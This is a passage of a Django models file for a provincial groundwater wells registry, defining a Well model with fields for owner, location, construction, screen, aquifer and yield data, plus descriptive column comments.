' on the information provided by the data submitter and analysis done by staff. E.g.'
' (10 m accuracy) ICF cadastre and good location sketch, (200 m accuracy) Digitized'
' from 1:50,000 mapping, (unknown, accuracy based on parcel size) ICF cadastre, poor'
                            ' or no location sketch, arbitrarily located in center of parcel.')
def __str__(self):
return self.description
class AquiferLithologyCode(CodeTableModel):
"""
Choices for describing Completed Aquifer Lithology
"""
aquifer_lithology_code = models.CharField(primary_key=True, max_length=100,
db_column='aquifer_lithology_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'aquifer_lithology_code'
ordering = ['display_order', 'aquifer_lithology_code']
verbose_name_plural = 'Aquifer Lithology Codes'
def __str__(self):
return '{} - {}'.format(self.aquifer_lithology_code, self.description)
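# A minimal query sketch for the Well model defined below (hypothetical
# well_tag_number, assuming migrations and the code tables are loaded):
#
#     well = (Well.objects
#             .select_related('well_class', 'intended_water_use')
#             .get(well_tag_number=12345))
#     print(well.well_class.description, well.latitude, well.longitude)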
# TODO: Consider having Well and Submission extend off a common base class, given that
# they mostly have the exact same fields!
@reversion.register()
class Well(AuditModelStructure):
"""
Well information.
"""
well_guid = models.UUIDField(
primary_key=False, default=uuid.uuid4, editable=False)
well_tag_number = models.AutoField(
primary_key=True, verbose_name='Well Tag Number',
        db_comment=('The file number assigned to a particular well in the province\'s Groundwater '
'Wells and Aquifers application.'))
identification_plate_number = models.PositiveIntegerField(
unique=True, blank=True, null=True, verbose_name="Well Identification Plate Number",
db_comment=('Steel plate with a unique number that is attached to required wells under the '
'groundwater protection regulations such as water supply wells, recharge or injection '
'wells made by drilling or boring, and permanent dewatering wells.'))
owner_full_name = models.CharField(
max_length=200, verbose_name='Owner Name')
owner_mailing_address = models.CharField(
max_length=100, verbose_name='Mailing Address')
owner_city = models.CharField(max_length=100, verbose_name='Town/City', blank=True, null=True)
owner_province_state = models.ForeignKey(
ProvinceStateCode, db_column='province_state_code', on_delete=models.PROTECT, blank=True,
verbose_name='Province', null=True)
owner_postal_code = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Postal Code')
owner_email = models.EmailField(
null=True, blank=True, verbose_name='Email address')
owner_tel = models.CharField(
null=True, blank=True, max_length=25, verbose_name='Telephone number')
well_class = models.ForeignKey(
WellClassCode, db_column='well_class_code', blank=True, null=False, default='UNK',
on_delete=models.PROTECT, verbose_name='Well Class',
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering,'
' Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
well_subclass = models.ForeignKey(WellSubclassCode, db_column='well_subclass_guid',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Subclass')
intended_water_use = models.ForeignKey(
IntendedWaterUseCode, db_column='intended_water_use_code',
on_delete=models.PROTECT, blank=True, null=False, default='NA',
verbose_name='Intended Water Use',
db_comment=('The intended use of the water in a water supply well as reported by the driller at'
' time of work completion on the well. E.g DOM, IRR, DWS, COM'))
well_status = models.ForeignKey(
WellStatusCode, db_column='well_status_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Status',
db_comment=('Status of a well indicates whether the report relates to the construction,'
' alteration, or decommission of the well; e.g., Construction, Alteration,'
' Abandoned, Deccommission.'))
well_publication_status = models.ForeignKey(WellPublicationStatusCode,
db_column='well_publication_status_code',
on_delete=models.PROTECT,
verbose_name='Well Publication Status',
default='Published')
licences = models.ManyToManyField('aquifers.WaterRightsLicence')
street_address = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Street Address',
db_comment='Street address for where the property that the well is physically located on.')
city = models.CharField(
max_length=50, blank=True, null=True,
verbose_name='Town/City',
db_comment='The city or town in which the well is located as part of the well location address.')
legal_lot = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Lot')
legal_plan = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Plan')
legal_district_lot = models.CharField(
max_length=20, blank=True, null=True, verbose_name='District Lot')
legal_block = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Block')
legal_section = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Section')
legal_township = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Township')
legal_range = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Range')
land_district = models.ForeignKey(LandDistrictCode, db_column='land_district_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Land District')
legal_pid = models.PositiveIntegerField(blank=True, null=True,
verbose_name='Property Identification Description (PID)')
well_location_description = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Description of Well Location',
db_comment=('Descriptive details of a well\'s location. E.g. the well is located 20\' south west of '
'the house; or the well is located in the pump house near the pond.'))
construction_start_date = models.DateField(
null=True, verbose_name='Construction Start Date',
db_comment='The date when well construction started.')
construction_end_date = models.DateField(
null=True, verbose_name='Construction Date',
db_comment='The date when well construction ended.')
alteration_start_date = models.DateField(
null=True, verbose_name='Alteration Start Date',
db_comment='The date when the alteration on a well started.')
alteration_end_date = models.DateField(
null=True, verbose_name='Alteration Date',
db_comment='The date when the alteration on a well was ended.')
decommission_start_date = models.DateField(
null=True, verbose_name='Decommission Start Date',
db_comment='The start date of when the well was decommissioned.')
decommission_end_date = models.DateField(
null=True, verbose_name='Decommission Date')
well_identification_plate_attached = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Well Identification Plate Is Attached',
db_comment=('Description of where the well identification plate has been attached on or near the '
'well.'))
id_plate_attached_by = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Well identification plate attached by')
    # Contains the well's longitude and latitude (in that order). Source coordinates
    # may be supplied in BC Albers, but the point is stored as WGS 84 lat/lon
    # (SRID 4326) to avoid rounding errors.
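    # A minimal conversion sketch (an illustration only, not necessarily how
    # submissions are processed): a point received in BC Albers (EPSG:3005) could
    # be reprojected with the GDAL helpers imported above, e.g.
    #     ct = CoordTransform(SpatialReference(3005), SpatialReference(4326))
    #     point.transform(ct)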
geom = models.PointField(
blank=True, null=True, verbose_name='Geo-referenced Location of the Well', srid=4326)
ground_elevation = models.DecimalField(
max_digits=10, decimal_places=2, blank=True, null=True, verbose_name='Ground Elevation')
ground_elevation_method = models.ForeignKey(GroundElevationMethodCode,
db_column='ground_elevation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Elevation Determined By')
drilling_methods = models.ManyToManyField(DrillingMethodCode, verbose_name='Drilling Methods',
blank=True)
well_orientation = models.BooleanField(default=True, verbose_name='Orientation of Well', choices=(
(True, 'vertical'), (False, 'horizontal')))
well_orientation_status = models.ForeignKey(WellOrientationCode, db_column='well_orientation_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Orientation Code')
surface_seal_material = models.ForeignKey(SurfaceSealMaterialCode, db_column='surface_seal_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Material')
surface_seal_depth = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Surface Seal Depth')
surface_seal_thickness = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Surface Seal Thickness')
surface_seal_method = models.ForeignKey(SurfaceSealMethodCode, db_column='surface_seal_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Installation Method')
backfill_type = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Backfill Material Above Surface Seal',
db_comment=('Indicates the type of backfill material that is placed above the surface seal'
' during the construction or alteration of well.'))
backfill_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Backfill Depth',
db_comment='The depth in feet of any backfill placed above the surface seal of a well.')
liner_material = models.ForeignKey(LinerMaterialCode, db_column='liner_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Liner Material')
liner_diameter = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner Diameter',
validators=[MinValueValidator(Decimal('0.00'))])
liner_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Liner Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
liner_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner From',
validators=[MinValueValidator(Decimal('0.00'))])
liner_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner To', validators=[MinValueValidator(Decimal('0.01'))])
screen_intake_method = models.ForeignKey(ScreenIntakeMethodCode, db_column='screen_intake_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Intake Method')
screen_type = models.ForeignKey(ScreenTypeCode, db_column='screen_type_code',
on_delete=models.PROTECT, blank=True, null=True, verbose_name='Type')
screen_material = models.ForeignKey(ScreenMaterialCode, db_column='screen_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Material')
other_screen_material = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Material')
screen_opening = models.ForeignKey(ScreenOpeningCode, db_column='screen_opening_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Opening')
screen_bottom = models.ForeignKey(ScreenBottomCode, db_column='screen_bottom_code',
on_delete=models.PROTECT, blank=True, null=True, verbose_name='Bottom')
other_screen_bottom = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Bottom')
screen_information = models.CharField(
max_length=300, blank=True, null=True, verbose_name="Screen Information"
)
filter_pack_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack From',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack To',
validators=[MinValueValidator(Decimal('0.01'))])
filter_pack_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Filter Pack Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_material = models.ForeignKey(FilterPackMaterialCode, db_column='filter_pack_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material')
filter_pack_material_size = models.ForeignKey(FilterPackMaterialSizeCode,
db_column='filter_pack_material_size_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material Size')
development_methods = models.ManyToManyField(DevelopmentMethodCode, blank=True,
verbose_name='Development Methods')
development_hours = models.DecimalField(max_digits=9, decimal_places=2, blank=True, null=True,
verbose_name='Development Total Duration',
validators=[MinValueValidator(Decimal('0.00'))])
development_notes = models.CharField(
max_length=255, blank=True, null=True, verbose_name='Development Notes')
water_quality_characteristics = models.ManyToManyField(
WaterQualityCharacteristic, db_table='well_water_quality', blank=True,
verbose_name='Obvious Water Quality Characteristics')
water_quality_colour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Colour')
water_quality_odour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Odour')
total_depth_drilled = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Total Depth Drilled')
finished_well_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Finished Well Depth',
db_comment=('The depth at which the well was \'finished\'. It can be shallower from the total well '
'depth which is the total depth at which the well was drilled. The finished depth is '
'represented in units of feet bgl (below ground level).'))
final_casing_stick_up = models.DecimalField(
max_digits=6, decimal_places=3, blank=True, null=True, verbose_name='Final Casing Stick Up')
bedrock_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Depth to Bedrock',
db_comment='Depth below ground level at which bedrock starts, measured in feet.')
water_supply_system_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Name',
db_comment=('Name or identifier given to a well that serves as a water supply system. '
'Often, the name is a reflection of the community or system it serves; e.g. Town of '
'Osoyoos or Keremeos Irrigation District.'))
water_supply_system_well_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Well Name',
db_comment=('The specific name given to a water supply system well. Often, the name reflects which '
'well it is within the system, e.g. Well 1 or South Well'))
static_water_level = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Static Water Level (BTOC)',
db_comment='The level (depth below ground) to which water will naturally rise in a well without '
'pumping, measured in feet.')
well_yield = models.DecimalField(
max_digits=8, decimal_places=3, blank=True, null=True, verbose_name='Estimated Well Yield',
db_comment=('An approximate estimate of the capacity of the well to produce groundwater. Estimated '
'by the well driller during construction by conducting a well yield test. Measured in US '
'Gallons/minute.'))
artesian_flow = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Flow',
db_comment=('Measurement of the artesian well\'s water flow that occurs naturally due to inherent'
' water pressure in the well. Pressure within the aquifer forces the groundwater to rise'
' above the land surface naturally without using a pump. Flowing artesian wells can flow'
' on an intermittent or continuous basis. Measured in US Gallons/minute.'))
artesian_pressure = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of '
'construction. Measured in PSI (pounds per square inch).'))
artesian_pressure_head = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure head',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of '
'construction. Measured in ft agl (feet above ground level).'))
artesian_conditions = models.BooleanField(default=False, verbose_name='Artesian Conditions',
db_comment=('Artesian conditions arise when there is a movement of '
'groundwater from a recharge area under a confining '
'formation to a point of discharge at a lower elevation. '
'An example of this is a natural spring, or in the '
'example of the drilling industry, a flowing water well.'))
well_cap_type = models.CharField(
max_length=40, blank=True, null=True, verbose_name='Well Cap')
well_disinfected = models.BooleanField(
default=False, verbose_name='Well Disinfected', choices=((False, 'No'), (True, 'Yes')))
well_disinfected_status = models.ForeignKey(WellDisinfectedCode, db_column='well_disinfected_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Disinfected Code')
comments = models.CharField(
max_length=3000, blank=True, null=True,
db_comment=('Free form text used by the user (driller or staff) to include comments for the well.'
                    ' Investigate how staff/developer comments are put in here from activity submission.'))
internal_comments = models.CharField(
max_length=3000, blank=True, null=True)
alternative_specs_submitted = models.BooleanField(
default=False,
verbose_name='Alternative specs submitted (if required)',
choices=((False, 'No'), (True, 'Yes')),
db_comment=('Indicates if an alternative specification was used for siting of a water supply'
' well, or a permanent dewatering well, or for the method used for decommissioning a'
' well.'))
well_yield_unit = models.ForeignKey(
WellYieldUnitCode, db_column='well_yield_unit_code', on_delete=models.PROTECT, blank=True, null=True)
# want to be integer in future
diameter = models.CharField(max_length=9, blank=True)
observation_well_number = models.CharField(
max_length=30, blank=True, null=True, verbose_name="Observation Well Number",
db_comment=('A unique number assigned to a well that has been included as part '
'of the Provincial Groundwater Observation Well Network, e.g., 406.'))
observation_well_status = models.ForeignKey(
ObsWellStatusCode, db_column='obs_well_status_code', blank=True, null=True,
verbose_name="Observation Well Status", on_delete=models.PROTECT,
db_comment=('Status of an observation well within the Provincial Groundwater Observation Well '
'Network, i.e. Active (a well that is currently being used to collect '
'groundwater information), Inactive (a well that is no longer being used to '
'collect groundwater information).'))
ems = models.CharField(max_length=10, blank=True, null=True,
verbose_name="Environmental Monitoring System (EMS) ID")
utm_zone_code = models.CharField(
max_length=10, blank=True, null=True, verbose_name="Zone")
utm_northing = models.IntegerField(
blank=True, null=True, verbose_name="UTM Northing")
utm_easting = models.IntegerField(
blank=True, null=True, verbose_name="UTM Easting")
coordinate_acquisition_code = models.ForeignKey(
CoordinateAcquisitionCode, default='H', blank=True, null=True, verbose_name="Location Accuracy Code",
db_column='coordinate_acquisition_code', on_delete=models.PROTECT,
db_comment=('Codes for the accuracy of the coordinate position, which is best estimated based on'
' the information provided by the data submitter and analysis done by staff. E.g. A,'
' B, C.'))
bcgs_id = models.ForeignKey(BCGS_Numbers, db_column='bcgs_id', on_delete=models.PROTECT, blank=True,
null=True, verbose_name="BCGS Mapsheet Number")
decommission_reason = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Reason for Decommission")
decommission_method = models.ForeignKey(
        DecommissionMethodCode, db_column='decommission_method_code', blank=True, null=True,
verbose_name="Method of Decommission", on_delete=models.PROTECT,
db_comment='Valid code for the method used to fill the well to close it permanently.')
decommission_sealant_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Decommission Sealant Material")
decommission_backfill_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Decommission Backfill Material")
decommission_details = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Decommission Details")
aquifer = models.ForeignKey(
'aquifers.Aquifer', db_column='aquifer_id', on_delete=models.PROTECT, blank=True,
null=True, verbose_name='Aquifer ID Number',
db_comment=('System generated unique sequential number assigned to each mapped aquifer. The'
' aquifer_id identifies which aquifer a well is in. An aquifer can have multiple'
' wells, while a single well can only be in one aquifer.'))
person_responsible = models.ForeignKey('registries.Person', db_column='person_responsible_guid',
on_delete=models.PROTECT,
verbose_name='Person Responsible for Drilling',
null=True, blank=True)
company_of_person_responsible = models.ForeignKey(
'registries.Organization', db_column='org_of_person_responsible_guid', on_delete=models.PROTECT,
verbose_name='Company of person responsible for drilling', null=True, blank=True)
driller_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Name of Person Who Did the Work')
consultant_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Name',
db_comment=('Name of consultant (person) that was involved in the construction, alteration, or'
                    ' decommission of a well.'))
consultant_company = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Company',
db_comment=('Name of consultant company that was involved in the construction, alteration, or'
                    ' decommission of a well.'))
# Aquifer related data
aquifer_vulnerability_index = models.DecimalField(
max_digits=10, decimal_places=0, blank=True, null=True, verbose_name='AVI',
        db_comment=('Valid codes that indicate the aquifer’s relative intrinsic vulnerability to impacts'
' from human activities at the land surface. Vulnerability is based on: the type,'
' thickness, and extent of geologic materials above the aquifer, depth to water'
' table (or to top of confined aquifer), and type of aquifer materials. E.g. H, L, M'))
storativity = models.DecimalField(
max_digits=8, decimal_places=7, blank=True, null=True, verbose_name='Storativity')
transmissivity = models.DecimalField(
max_digits=30, decimal_places=10, blank=True, null=True, verbose_name='Transmissivity')
hydraulic_conductivity = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Hydraulic Conductivity')
specific_storage = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Specific Storage')
specific_yield = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Specific Yield')
testing_method = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Testing Method')
testing_duration = models.PositiveIntegerField(blank=True, null=True)
analytic_solution_type = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Analytic Solution Type',
db_comment='Mathematical formulation used to estimate hydraulic parameters.')
boundary_effect = models.ForeignKey(BoundaryEffectCode, db_column='boundary_effect_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Boundary Effect',
db_comment='Valid codes for the boundaries observed in '
'pumping test analysis. i.e. CH, NF.')
aquifer_lithology = models.ForeignKey(
AquiferLithologyCode, db_column='aquifer_lithology_code', blank=True, null=True,
on_delete=models.PROTECT,
verbose_name='Aquifer Lithology',
db_comment=('Valid codes for the type of material an aquifer consists of. i.e., Unconsolidated, '
'Bedrock, Unknown.'))
# Production data related data
yield_estimation_method = models.ForeignKey(
YieldEstimationMethodCode, db_column='yield_estimation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Estimation Method')
yield_estimation_rate = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='Estimation Rate',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
yield_estimation_duration = models.DecimalField(
max_digits=9, decimal_places=2, verbose_name='Estimation Duration',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.01'))])
static_level_before_test = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='SWL Before Test',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.0'))])
drawdown = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
hydro_fracturing_performed = models.BooleanField(
default=False, verbose_name='Hydro-fracturing Performed?',
choices=((False, 'No'), (True, 'Yes')))
hydro_fracturing_yield_increase = models.DecimalField(
max_digits=7, decimal_places=2,
verbose_name='Well Yield Increase Due to Hydro-fracturing',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_depth = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump depth',
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_rate = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump rate',
validators=[MinValueValidator(Decimal('0.00'))])
class Meta:
db_table = 'well'
verbose_name = 'A well record'
def __str__(self):
if self.well_tag_number:
return '%d %s' % (self.well_tag_number, self.street_address)
else:
return 'No well tag number %s' % (self.street_address)
# Custom JSON serialisation for Wells. Expand as needed.
def as_dict(self):
return {
"latitude": self.latitude,
"longitude": self.longitude,
"guid": self.well_guid,
"identification_plate_number": self.identification_plate_number,
"street_address": self.street_address,
"well_tag_number": self.well_tag_number
}
@property
def licenced_status(self):
return LicencedStatusCode.objects.get(licenced_status_code='LICENSED') if self.licences.all().exists() \
else LicencedStatusCode.objects.get(licenced_status_code='UNLICENSED')
@property
def latitude(self):
if self.geom:
return self.geom.y
else:
return None
@property
def longitude(self):
if self.geom:
return self.geom.x
else:
return None
    db_table_comment = ('Describes how a well was constructed, altered, or decommissioned over time. Includes '
'information related to who owns the well, location of well, the lithologic '
'description as well as other information related to the construction of the well.')
db_column_supplemental_comments = {
"alternative_specs_submitted":"Indicates if an alternative specification was used for siting of a water supply well or a permanent dewatering well, or if an alternative specification was used for decommissioning a well.",
"aquifer_id":"System generated sequential number assigned to each aquifer. It is widely used by groundwater staff as it is the only consistent unique identifier for a mapped aquifer. It is also commonly referred to as Aquifer Number.",
"artesian_flow":"Measurement of the artesian well's water flow that occurs naturally due to inherent water pressure in the well. Pressure within the aquifer forces the groundwater to rise above the land surface naturally without using a pump. Flowing artesian wells can flow on an intermittent or continuous basis. Recorded in US Gallons Per Minute.",
"artesian_pressure":"Pressure of the water coming out of an artesian well as measured at the time of construction. Measured in PSI (pounds per square inch).",
"artesian_pressure_head":"Pressure of the water coming out of an artesian well as measured at the time of construction. Measured in ft agl (feet above ground level).",
"artesian_conditions":"Artesian conditions arise when there is a movement of groundwater from a recharge area under a confining formation to a point of discharge at a lower elevation. An example of this is a natural spring, or in the example of the drilling industry, a flowing water well.",
"bcgs_id":"TO BE DELETED?",
"boundary_effect_code":"Valid codes for the boundaries observed in pumping test analysis. i.e. CH, NF.",
"decommission_backfill_material":"Backfill material used to decommission a well. ",
"decommission_details":"Information about the decommissioning of a well as provided by the driller.",
"decommission_end_date":"The end date of when the decommissioning of the well was completed.",
"decommission_method_code":"Valid code for the method used to fill the well to decommission it permanently.",
"decommission_reason":"The reason why the well was decomssioned as provided by the driller.",
"decommission_sealant_material":"Describes the sealing material or a mixture of the sealing material used to decommission a well.",
"decommission_start_date":"The start date of when the decommissioning of the well began.",
"development_hours":"Total hours devoted to developing as well ('develop' in relation to a well, means remove from an aquifer the fine sediment and other organic or inorganic material that immediately surrounds the well screen, the drill hole or the intake area at the bottom of the well)",
"development_notes":"Information about the development of the well.",
"drawdown":"Drawdown is the drop in water level when water is being pumped. ",
"ems":"Unique ID assigned through the Environmental Monitoring System (EMS) that relates to water quality data within the EMS application.",
"filter_pack_from":"The starting depth in feet below ground level at which the filter pack was placed.",
"filter_pack_material_code":"Codes for the materials used in the filter pack, which are placed in the annulus of the well between the borehole wall and the well screen, and are used to settle-out fine grained particles that may otherwise enter the well. I.e. Fine gravel, very course sand, very fine gravel, other",
"filter_pack_material_size_code":"Codes for the sizes of the material used in the well filter pack. E.g. 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.",
"filter_pack_thickness":"The thickness in inches of the filter pack material used for a well.",
"filter_pack_to":"The end depth in feet below ground level at which the filter pack was placed.",
"final_casing_stick_up":"The length in inches of the production casing in the well that is above the surface of the ground adjacent to the well, or the floor of the well sump, pump house or well pit.",
"finished_well_depth":"The depth at which the well was 'finished'. It can be shallower than the total well depth which is the total depth drilled. Recorded in feet below ground level.",
"geom":"Estimated point location of the well. All UTM coordinates are converted to this geom column for storage and display. The geometry of the well should be considered aong with the coordinate acquisition code to get the estimated accuracy of the location.",
"ground_elevation":"The elevation above sea-level of the ground surface at the well, measured in feet.",
"ground_elevation_method_code":"Code for method used to determine the ground elevation of a well. E.g. GPS, Altimeter, Differential GPS, Level, 1:50,000 map, 1:20,000 map.",
"hydraulic_conductivity":"The ability of the rock or unconsolidated material to transmit water.",
"hydro_fracturing_performed":"Indicates if high pressure water was injected into the well to help break apart the bedrock in order to get more water out of the well.",
"hydro_fracturing_yield_increase":"How much the well yeild increases once hydro fracturing was performed, recorded in US gallons per minute.",
"id_plate_attached_by":"The person who attached the id plate to the well.",
"identification_plate_number":"Steel plate with a unique number that is attached to wells as required wells under the Groundwater Protection Regulationsuch as water supply wells, recharge or injection wells made by drilling or boring, and permanent dewatering wells.",
"intended_water_use_code":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g, DOM, IRR, DWS, COM, UNK, OTHER",
"internal_comments":"Staff only comments and information related to the well, and for internal use only, not to be made public.",
"land_district_code":"Codes used to identify legal land district used to help identify the property where the well is located. E.g. Alberni, Barclay, Cariboo.",
"legal_pid":"A Parcel Identifier or PID is a nine-digit number that uniquely identifies a parcel in the land title register of in BC. The Registrar of Land Titles assigns PID numbers to parcels for which a title is being entered in the land title register as a registered title. The Land Title Act refers to the PID as “the permanent parcel identifier”.",
"licenced_status_code":"Valid licensing options granted to a well under the Water Sustainability Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical.",
"liner_diameter":"Diameter of the liner placed inside the well. Measured in inches.",
"liner_from":"Depth below ground level at which the liner starts inside the well. Measured in feet.",
"liner_material_code":"Code that describes the material noted for lithology. E.g. Rock, Clay, Sand, Unspecified,",
"liner_thickness":"Thickness of the liner inside the well. Measured in inches.",
"liner_to":"Depth below ground level at which the liner ends inside the well. Measured in feet.",
"other_screen_bottom":"Describes the type of bottom installed on a well screen when the bottom type is different from all the types in the screen bottom drop down list and the data submitter picks 'Other ' from the list.",
"other_screen_material":"Describes the material that makes up the screen on a well when the material is different from all the drop down options and the data submitter picks 'Other ' from the list.",
"owner_city":"City where the owner of the well resides.",
"owner_email":"Email address of the well owner, not to be published to the public. ",
"owner_full_name":"First name and last name of the well owner. ",
"owner_mailing_address":"Street name and number of the well owner.",
"owner_postal_code":"Postal code of the well owner attached to the owner mailing address.",
"owner_tel":"Telephone number for the well owner, not to be published to the public.",
"province_state_code":"Province or state code used for the mailing address for the company",
"recommended_pump_depth":"Depth of the a pump placed within the well, as recommended by the well driller or well pump installer, measured in feet below depth of the top of the production casing.",
"recommended_pump_rate":"The rate at which to withdraw water from the well as recommended by the well driller or well pump installer, measured in US gallons per minute.",
"screen_bottom_code":"Valid categories used to identify the type of bottom on a well screen. It provides for a standard commonly understood code and description for screen bottoms. Some examples include: Bail, Plate, Plug. 'Other' can also be specified.",
"screen_information":"Information about the screen that is not captured elsewhere, as provided by the well driller.",
"screen_intake_method_code":"Valid categories used to identify the type of intake mechanism for a well screen. It provides for a standard commonly understood code and description for screen intake codes. Some examples include: Open bottom, Screen, Uncased hole.",
"screen_material_code":"Describes the different materials that makes up the screen on a well. E.g. Plastic, Stainless Steel, Other.",
"screen_opening_code":"Valid categories used to identify the type of opening on a well screen. It provides for a standard commonly understood code and description for screen openings. E.g. Continuous Slot, Perforated Pipe, Slotted.",
"screen_type_code":"Valid categories for the type of well screen installed in a well. i.e. Pipe size, Telescope, Other",
"specific_storage":"The volume of water that the aquifer releases from storage, per volume per aquifer of hydraulic unit head.",
"static_level_before_test":"Resting static water level prior to pumping, measured in feet below ground level or feet below top of the production casing.",
"storativity":"The storativity (or storage coefficient ) is the amount of water stored or released per unit area of aquifer given unit change in head. ",
"surface_seal_depth":"The depth at the bottom of the surface seal, measured in feet.",
"surface_seal_material_code":"Valid materials used for creating the surface seal for a well. A surface seal is a plug that prevents surface runoff from getting into the aquifer or well and contaminating the water. E.g. Bentonite clay, Concrete grout, Sand cement grout, Other.",
"surface_seal_method_code":"Valid methods used to create the surface seal for a well. i.e. Poured, Pumped, Other.",
"surface_seal_thickness":"The thickness of the surface sealant placed in the annular space around the outside of the outermost well casing, measured in inches.",
"total_depth_drilled":"Total depth drilled when constructing or altering a well. It may be different from the finished well depth which can be shallower than the total well depth. Measured in feet below ground level.",
"transmissivity":"Transmissivity is the rate of flow under a unit hydraulic gradient through a unit width of aquifer of thickness ",
"water_quality_colour":"Valid codes for the colour of the water as recorded at time of work. E.g. Orange, Black, Clear, Other",
"water_quality_odour":"Description of the odour of the water as recorded at time of work.",
"well_cap_type":"Description of the type of well cap used on the well.",
"well_class_code":"Valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering, Drainage, Remediation, Geotechnical, Closed-loop geoexchange.",
"well_disinfected":"Indicates if the well was disinfected after the well construction or alteration was completed.",
"well_orientation":"Describes the physical orientation of a well as being either horizontal or vertical.",
"well_publication_status_code":"Codes that describe if a well record is published for public consumption or unpublished and not available to the public due to data duplication and other data quality issues.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
